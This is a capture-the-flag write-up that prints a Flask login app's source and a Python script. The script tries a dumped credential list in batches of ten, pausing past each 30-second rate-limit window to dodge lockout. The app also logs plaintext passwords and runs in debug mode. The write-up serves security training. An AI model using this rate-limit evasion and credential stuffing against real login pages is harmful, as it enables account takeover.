Fool the Lockout
Files Provided
Two files are provided: creds-dump.txt and app.py. The source of app.py:
from flask import Flask, render_template, request, redirect, url_for, session, make_response
import time
import secrets
import json
# Flask application object; its secret key is a fresh random hex token
# generated each time this module is loaded.
app = Flask(__name__)
app.secret_key = secrets.token_hex(16)

# In-memory credential store. Layout:
#   {
#       username: "password"
#   }
user_db = {}

# Per-client request bookkeeping, keyed by IP address. Layout:
#   "ip_addr": {
#       "num_requests": int        # POSTs counted in the current epoch
#       "epoch_start": timestamp   # -1 while no epoch is running
#       "lockout_until": int       # -1 if not locked out, timestamp of lockout end
#   }
request_rates = {}

# Rate-limit tuning knobs.
MAX_REQUESTS = 10       # POST requests tolerated per epoch before lockout
EPOCH_DURATION = 30     # length of one counting window (in seconds)
LOCKOUT_DURATION = 120  # length of a lockout once triggered (in seconds)

# Response body returned to clients that are over the limit.
RATE_LIMITED_HTML = "<h1>Rate Limited Exceeded</h1><p>You have sent too many requests, requests from your IP will be temporarily blocked.</p>"
## ------------------------ HELPER FUNCTIONS ------------------------ ##
"""Quick function to no-cache web page responses"""
def no_cache(response):
    """Mark *response* as non-cacheable and return it.

    Sets the ``Cache-Control``, ``Pragma`` and ``Expires`` headers on the
    given response object in place.

    Args:
        response: Object exposing a mutable ``headers`` mapping (the routes
            pass the result of ``make_response``).

    Returns:
        The same ``response`` object, so the call can wrap a return value.
    """
    response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
    response.headers["Pragma"] = "no-cache"
    response.headers["Expires"] = "-1"
    return response
"""Returns true if a user is logged in, false otherwise"""
def logged_in():
    """Return True when the session carries a ``"user"`` key, else False."""
    return "user" in session
"""Returns the current user (or None if there is none)"""
def current_user():
    """Return the username stored in the session, or None if there is none."""
    return session.get("user")
"""Add a new user to db"""
def add_new_user(username, password):
    """Register ``username`` with ``password`` in the in-memory ``user_db``.

    An existing entry for the same username is overwritten.

    Args:
        username: Key under which the credentials are stored.
        password: Value stored for that key, exactly as given.
    """
    # NOTE(review): the password is stored and printed in plaintext.
    user_db[username] = password
    print("Added (username=%s, password=%s) to user_db" % (username, password))
""" Updates the request rates db for a given client ip, since information will likely be stale."""
def refresh_request_rates_db(client_ip):
    """Expire stale rate-limit state for ``client_ip`` in ``request_rates``.

    Does nothing when the client has no entry yet. Otherwise:

    * if more than ``EPOCH_DURATION`` seconds have passed since
      ``epoch_start``, the request counter is reset to 0 and the epoch is
      marked as not running (``-1``);
    * if a lockout was recorded and its end time has been reached,
      ``lockout_until`` is reset to ``-1``.

    The two checks are independent: the counter is cleared once the epoch
    elapses whether or not a lockout is still pending.

    Args:
        client_ip: Key of the entry to refresh.
    """
    entry = request_rates.get(client_ip)
    if entry is None:
        return

    # One timestamp for both checks keeps them mutually consistent.
    now = time.time()

    # An entry with epoch_start == -1 (no epoch running) also passes this
    # test; resetting it again is a harmless no-op.
    if now - entry["epoch_start"] > EPOCH_DURATION:
        entry["num_requests"] = 0
        entry["epoch_start"] = -1

    # Clear a lockout whose end time has passed.
    lockout_end = entry["lockout_until"]
    if lockout_end != -1 and now >= lockout_end:
        entry["lockout_until"] = -1
"""For a given user IP, checks how many requests the user has made (by updating the storage) and if
the user it has exceeded the assigned rate limit. Returns true if the user has exceeded rate limit,
false otherwise. """
def exceeded_rate_limit() -> bool:
    """Record the current request and report whether its client is over the limit.

    The client is identified by ``request.remote_addr``. Its entry in
    ``request_rates`` is refreshed first (and created if missing), then:

    * a POST request increments ``num_requests`` and starts the epoch if
      none is running;
    * if ``num_requests`` is now above ``MAX_REQUESTS``, a lockout end time
      is recorded (unless one is already set) and True is returned.

    The decision is based solely on ``num_requests``; ``lockout_until`` is
    written here but is not consulted when deciding what to return.

    Returns:
        True if the client has exceeded ``MAX_REQUESTS`` in the current
        epoch, False otherwise.
    """
    # Could do a daemon, but since checks of status are always done before
    # updating it's not really necessary.
    now = time.time()

    client_ip = request.remote_addr
    print(f"Request ip address: {client_ip}", flush=True)

    # Drop stale state, then make sure the client has an entry.
    refresh_request_rates_db(client_ip)
    if client_ip not in request_rates:
        request_rates[client_ip] = {
            "num_requests": 0,
            "epoch_start": -1,
            "lockout_until": -1,
        }
        print("New entry added to db", flush=True)
    entry = request_rates[client_ip]

    # Only POST requests count towards the limit.
    if request.method == "POST":
        entry["num_requests"] += 1
        # The first counted request opens a new epoch.
        if entry["epoch_start"] == -1:
            entry["epoch_start"] = now
        print(f"DB updated - {client_ip}:{entry}", flush=True)

    if entry["num_requests"] > MAX_REQUESTS:
        # Record the lockout end only once per lockout.
        if entry["lockout_until"] == -1:
            entry["lockout_until"] = now + LOCKOUT_DURATION
            print("Account locked out")
        print(f"DB - {client_ip}:{entry}", flush=True)
        return True
    return False
## ------------------------ APP ROUTES ------------------------ ##
""" Login portal """
@app.route("/login", methods=['GET', 'POST'])
def login():
    """Serve the login page and process login attempts.

    Every request is first run through ``exceeded_rate_limit``. A POST
    compares the submitted ``username``/``password`` form fields against
    ``user_db``; on a match the username is stored in the session.

    Returns:
        ``RATE_LIMITED_HTML`` when the client is over the rate limit; the
        login template with an error message on bad credentials; a redirect
        to ``index`` on success; otherwise the login template wrapped by
        ``no_cache``.
    """
    if exceeded_rate_limit():
        return RATE_LIMITED_HTML

    # if POST, accept form data and try to authenticate
    if request.method == "POST":
        user_input = request.form['username']
        pswd_input = request.form['password']
        # NOTE(review): the submitted password is printed in plaintext.
        print("User input: %s, password input: %s" % (user_input, pswd_input))

        # non-existent user or bad password
        if (user_input not in user_db) or (user_db[user_input] != pswd_input):
            msg = "Invalid username or password."
            return render_template("login.html", error=msg)

        # authenticate user
        session["user"] = user_input
        print("Successfully logged in, session=%s" % (session))
        return redirect(url_for("index"))  # note 'index' refers to the FUNCTION NAME

    # return normal page if 'GET'
    return no_cache(make_response(render_template('login.html')))
""" Homepage """
@app.route("/", methods=['GET'])
def index():
    """Serve the homepage, including the flag, to a logged-in user.

    Returns:
        ``RATE_LIMITED_HTML`` when the client is over the rate limit; a
        redirect to ``login`` when nobody is logged in; otherwise the
        ``index.html`` template rendered with the current user and the
        contents of ``/challenge/flag.txt``, wrapped by ``no_cache``.
    """
    if exceeded_rate_limit():
        return RATE_LIMITED_HTML

    # authenticate
    if not logged_in():
        return redirect(url_for("login"))

    # display homepage according to login
    user = current_user()
    # Context manager so the file handle is closed on every request.
    with open("/challenge/flag.txt") as flag_file:
        flag = flag_file.read().strip()
    return no_cache(make_response(render_template("index.html", user=user, flag=flag)))
""" Logout """
@app.route("/logout", methods=['GET'])
def logout():
    """Log the current user out and send the client to the login page.

    Returns:
        ``RATE_LIMITED_HTML`` when the client is over the rate limit;
        otherwise a redirect to ``login``, after removing ``"user"`` from
        the session if it was present.
    """
    if exceeded_rate_limit():
        return RATE_LIMITED_HTML

    if "user" in session:
        session.pop('user', None)
        print("Logged out, popped session")
    return redirect(url_for("login"))
if __name__ == '__main__':
    # Load the single account for this instance from the profile file.
    # Any failure (missing file, bad JSON, missing key) aborts start-up.
    try:
        with open("/challenge/profile.json", "r") as file:
            profile = json.load(file)
        username = profile["username"]
        password = profile["password"]
    except Exception as e:
        print(f"Error setting up profile in app:\n{e}")
        # SystemExit directly, rather than the site-provided exit() helper.
        raise SystemExit(1)

    # add new user
    add_new_user(username, password)

    # start app
    # NOTE(review): debug=True is combined with listening on all
    # interfaces; confirm this is intended outside the challenge setup.
    app.run(host='0.0.0.0', port=8000, debug=True)
Approach
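EPOCH_DURATION is only 30 seconds, and the per-IP request counter is reset to 0 as soon as an epoch has elapsed. The rate limit only triggers when more than MAX_REQUESTS (10) POST requests arrive within one epoch, so we can send 10 login attempts, pause for a little over 30 seconds, and repeat without ever being locked out. Since creds-dump.txt has only 100 credentials, this needs at most ten such pauses (roughly 5 minutes in total), so this approach won't result in a timeout of the instance.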
Script:
import time

import requests

url = "http://candy-mountain.picoctf.net:59159/login"

# The server tolerates MAX_REQUESTS = 10 POSTs per epoch and resets its
# counter once EPOCH_DURATION = 30 s have elapsed, so send in batches of 10
# and wait slightly longer than one epoch between batches.
BATCH_SIZE = 10
EPOCH_WAIT = 31

# One "username;password" pair per line; blank lines are skipped.
with open("creds-dump.txt") as f:
    creds = [line.strip() for line in f if line.strip()]

for i, cred in enumerate(creds, start=1):
    # Split on the first ';' only, so a password may itself contain ';'.
    user, pwd = cred.split(";", 1)
    r = requests.post(
        url,
        data={
            "username": user,
            "password": pwd,
        },
        allow_redirects=False,  # a 302 is the success signal, keep it visible
        timeout=10,             # do not hang forever on a stalled connection
    )
    print(user, pwd, r.status_code)

    # A successful login answers with a redirect to the homepage.
    if r.status_code == 302:
        print("FOUND:", user, pwd)
        break

    # Pause after every full batch, except after the very last credential.
    if i % BATCH_SIZE == 0 and i < len(creds):
        print(f"Sleeping {EPOCH_WAIT}s to reset epoch...")
        time.sleep(EPOCH_WAIT)